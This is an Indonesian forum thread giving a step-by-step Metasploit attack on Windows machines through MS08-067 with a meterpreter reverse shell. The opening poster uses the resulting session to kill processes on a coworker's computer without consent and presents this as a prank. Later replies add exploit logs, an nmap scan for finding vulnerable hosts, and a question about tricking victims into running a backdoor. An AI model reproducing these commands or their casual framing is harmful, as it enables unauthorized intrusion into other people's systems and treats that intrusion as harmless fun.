Exploit Windows ga pake Backdoor + ngerjain temen
#1
Permisi
si NEWBIE numpang post Big Grin
maap yah om momod kalo ga bermanfaat, boleh di hapus aja

Ini sebenarnya terinspirasi dari ebooknya milik orang india
kayanya orang disni udah pada tau semua deh
tapi aku share aja siapa tau masih ada yang belom tau
disini aku ganti payloadnya pake meterpreter dan berhasil.
oke langsung aja ke tkp

Victim-nya om
Spoiler! :
Windows 2000 Universal
Windows 2003 SP1 Japanese (NO NX)
Windows 2003 SP2 English (NO NX)
Windows 2003 SP2 English (NX)
Windows 2003 SP2 German (NO NX)
Windows 2003 SP2 German (NX)
Windows XP SP2 Arabic (NX)
Windows XP SP2 Chinese - Traditional / Taiwan (NX)
Windows XP SP2 Chinese - Simplified (NX)
Windows XP SP2 Chinese - Traditional (NX)
Windows XP SP2 Czech (NX)
Windows XP SP0/SP1 Universal
Windows XP SP2 Danish (NX)
Windows XP SP2 German (NX)
Windows XP SP2 Greek (NX)
Windows XP SP2 Spanish (NX)
Windows XP SP2 Finnish (NX)
Windows XP SP2 French (NX)
Windows XP SP2 Hebrew (NX)
Windows XP SP2 Hungarian (NX)
Windows XP SP2 Italian (NX)
Windows XP SP2 Japanese (NX)
Windows XP SP2 English (AlwaysOn NX)
Windows XP SP2 Korean (NX)
Windows XP SP2 Dutch (NX)
Windows XP SP2 Norwegian (NX)
Windows XP SP2 Polish (NX)
Windows XP SP2 Portuguese - Brazilian (NX)
Windows XP SP2 Portuguese (NX)
Windows XP SP2 Russian (NX)
Windows XP SP2 Swedish (NX)
Windows XP SP2 Turkish (NX)
Windows XP SP3 Arabic (NX)
Windows XP SP2 English (NX)
Windows XP SP3 Chinese - Traditional / Taiwan (NX)
Windows XP SP3 Chinese - Simplified (NX)
Windows XP SP3 Chinese - Traditional (NX)
Windows XP SP3 Czech (NX)
Windows XP SP3 Danish (NX)
Windows XP SP3 German (NX)
Windows XP SP3 Greek (NX)
Windows XP SP3 Spanish (NX)
Windows XP SP3 Finnish (NX)
Windows XP SP3 French (NX)
Windows XP SP3 English (AlwaysOn NX)
Windows XP SP3 Hebrew (NX)
Windows XP SP3 Hungarian (NX)
Windows XP SP3 Italian (NX)
Windows XP SP3 Japanese (NX)
Windows XP SP3 Korean (NX)
Windows XP SP3 Dutch (NX)
Windows XP SP3 Norwegian (NX)
Windows XP SP3 Polish (NX)
Windows XP SP3 Portuguese - Brazilian (NX)
Windows XP SP3 Portuguese (NX)
Windows XP SP3 English (NX)
Windows XP SP3 Russian (NX)
Windows XP SP3 Swedish (NX)
Windows XP SP3 Turkish (NX)
Windows 2003 SP2 Japanese (NO NX)
Windows 2003 SP0 Universal
Windows 2003 SP1 English (NO NX)
Windows 2003 SP1 English (NX)

Attacker : Backtrack 5 r1

buka console ketik

Code:
#msfconsole

setelah terbukan metasploit consolenya langsung cari module netapi-nya ketik

Code:
msf >search netapi

setelah ketemu langsung aja ketik seperti berikut ini

Code:
use windows/smb/ms08_067_netapi
>set LHOST 192.168.0.126 <== IP Attacker
>set RHOST 192.168.0.115 <== IP Victim
>set payload windows/meterpreter/reverse_tcp
>exploit

Jika berhasil maka akan seperti berikut
Spoiler! :
[Image: 10n72ma.png]
setelah itu terserah deh om mau apain tuh target
kalo aku isengin temen satu kerjaan yang kerjaannya maen game terus
simpel aja cara buat isenginnya

Code:
meterpreter >ps

maka akan tampil
Spoiler! :
[Image: 2ymakwz.png]
langsung aku kill aja tuh game eco.exe nya dengan perintah

Code:
meterpreter >kill 2920

langsung DC tuh game
hehehhe
maap yah tmn ku abis maen game mulu sih Big Grin

sekian yang bisa aku sampaikan
semoga bisa bermafaat

CMIIW
Code:
99% [=====================================> ] 325,748,506 46.2K/s eta 75s

#2
klo selain ps ?? apa perintah lain gak kawan ???

#3
(01-30-2012, 03:38 PM)geeky Wrote: klo selain ps ?? apa perintah lain gak kawan ???

banyak Big Grin
cari aja cheatsheet metasploit

#4
kok punya ane gini terus ya bro
<code>

msf exploit(ms08_067_netapi) > set LHOST 172.16.21.190
LHOST => 172.16.21.190
msf exploit(ms08_067_netapi) > set RHOST 172.16.21.141
RHOST => 172.16.21.141
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 172.16.21.190:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows 7 Ultimate - (Build 7600) - lang:Unknown
[*] We could not detect the language pack, defaulting to English
[-] Exploit exception: No matching target
[*] Exploit completed, but no session was created.
</code>

#5
(01-31-2012, 08:26 AM)one Wrote: kok punya ane gini terus ya bro
<code>

msf exploit(ms08_067_netapi) > set LHOST 172.16.21.190
LHOST => 172.16.21.190
msf exploit(ms08_067_netapi) > set RHOST 172.16.21.141
RHOST => 172.16.21.141
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 172.16.21.190:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows 7 Ultimate - (Build 7600) - lang:Unknown
[*] We could not detect the language pack, defaulting to English
[-] Exploit exception: No matching target
[*] Exploit completed, but no session was created.

Itu berati targetnya ga pas Om
Ane coba buat exploit windows yang pake serial alsi juga ga bisa

Tapi kalo windows yang pake serial xp8bf-dst bisa dan lancar

Tapi ga tau tepatnya juga
mungkin OM momod lebih tau maklum ane pengguna baru

CMIIW
Code:
99% [=====================================> ] 325,748,506 46.2K/s eta 75s

#6
keren ni buat pelajaran keamanan komputer, buat pengguna baru kaya aku... heheh #... ^_^

#7
Cara liat IP victimnya gimana ya om? maklum pengguna baru

#8
(01-31-2012, 08:26 AM)one Wrote: kok punya ane gini terus ya bro
<code>

msf exploit(ms08_067_netapi) > set LHOST 172.16.21.190
LHOST => 172.16.21.190
msf exploit(ms08_067_netapi) > set RHOST 172.16.21.141
RHOST => 172.16.21.141
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 172.16.21.190:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows 7 Ultimate - (Build 7600) - lang:Unknown
[*] We could not detect the language pack, defaulting to English
[-] Exploit exception: No matching target
[*] Exploit completed, but no session was created.
</code>

coba di ping ip 172.16.21.141 bisa ga? klo firewall windowsnya nyala ga bisa bro, soalnya exploitnya udh lama itu, ms08_67_netapi == tahun 2008

(02-01-2012, 01:35 PM)radityanoor Wrote: Cara liat IP victimnya gimana ya om? maklum pengguna baru

ya di nmap dulu dong, pake script smb-check-vulns.nse
Code:
nmap --script=smb-check-vulns "ip address"

klo hasilnya seperti ini seharusnya bisa diexploitasi:
Quote:Nmap scan report for 192.168.10.207
Host is up (0.000010s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
53/tcp open domain
139/tcp open netbios-ssn
445/tcp open microsoft-ds

Host script results:
| smb-check-vulns:
| Conficker: UNKNOWN; not Windows, or Windows with disabled browser service (CLEAN); or Windows with crashed browser service (possibly INFECTED).
| | If you know the remote system is Windows, try rebooting it and scanning
| |_ again. (Error NT_STATUS_OBJECT_NAME_NOT_FOUND)
| regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
| SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
| MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)
|_ MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)

#9
mantab neh Big Grin pengen dcoba dolo XD

#10
@konspirasi : Oh ini brati exploit lama ya om!!!
trus kira" ada lagi ga exploit tapi yang ga harus pake backdoor

soalnya kalo pake backdoor
aku mentok di cara memasukan backdoor dan supaya victim ngebuka backdoornya.
Code:
99% [=====================================> ] 325,748,506 46.2K/s eta 75s






Users browsing this thread: 2 Guest(s)